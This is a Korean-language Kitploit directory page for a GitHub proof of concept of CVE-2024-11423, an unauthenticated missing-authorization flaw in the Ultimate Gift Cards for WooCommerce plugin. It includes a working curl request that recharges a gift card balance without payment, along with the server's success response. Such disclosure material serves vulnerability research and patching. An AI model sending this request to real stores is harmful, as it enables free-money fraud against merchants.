Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-11423 — Ultimate Gift Cards for WooCommerce <= 3.0.6 - 인가 누락으로 인한 무한 돈 버그 | Kitploit
도구/GitHubGitHub/randomrobbiebf/cve-2024-11423
Authentication & AuthorizationVulnerability AnalysisWeb Application ExploitationAPI Security TestingPenetration Testing
GitHubrandomrobbiebf/cve-2024-11423

CVE-2024-11423

Ultimate Gift Cards for WooCommerce <= 3.0.6 - 인가 누락으로 인한 무한 돈 버그

저장소 보기
21년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2024-11423

Ultimate Gift Cards for WooCommerce <= 3.0.6 - 누락된 권한 검사로 인한 무한 금액 오류

설명

Ultimate Gift Cards for WooCommerce – Create WooCommerce Gift Cards, Gift Vouchers, Redeem & Manage Digital Gift Coupons. Offer Gift Certificates, Schedule Gift Cards, and Use Advance Coupons With Personalized Templates WordPress 플러그인은 /wp-json/gifting/recharge-giftcard와 같은 여러 REST API 엔드포인트에서 기능 검사(capability check)가 누락되어 승인되지 않은 데이터 수정에 취약합니다. 이는 3.0.6을 포함한 모든 버전에 영향을 미칩니다. 이로 인해 인증되지 않은 공격자는 결제 없이 기프트 카드 잔액을 충전하거나, 아무것도 구매하지 않고 기프트 카드 잔액을 줄일 수 있습니다.

세부 정보

  • 유형: 플러그인
  • 슬러그: woo-gift-cards-lite
  • 영향을 받는 버전: 3.0.6
  • CVSS 점수: 7.5
  • CVSS 등급: 높음
  • CVSS 벡터: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
  • CVE: CVE-2024-11423
  • 상태: 활성

POC

root@kitploit:~
curl -X POST \
  https://wp-dev.ddev.site/wp-json/gifting/recharge-giftcard \
  -H 'Content-Type: application/json' \
  -d '{"coupon_code": "CUQP4C9M", "recharge_amount": "100.00", "coupon_expiry": "2027-12-31", "usage_limit": "511"}'


{"code":"success","message":"Coupon is successfully Recharged","data":{"status":200,"remaining_amount":120,"discount_type":"fixed_cart","usage_count":0,"usage_limit":"511","description":"","coupon_expiry":"2027-12-31"}}

도구 다운로드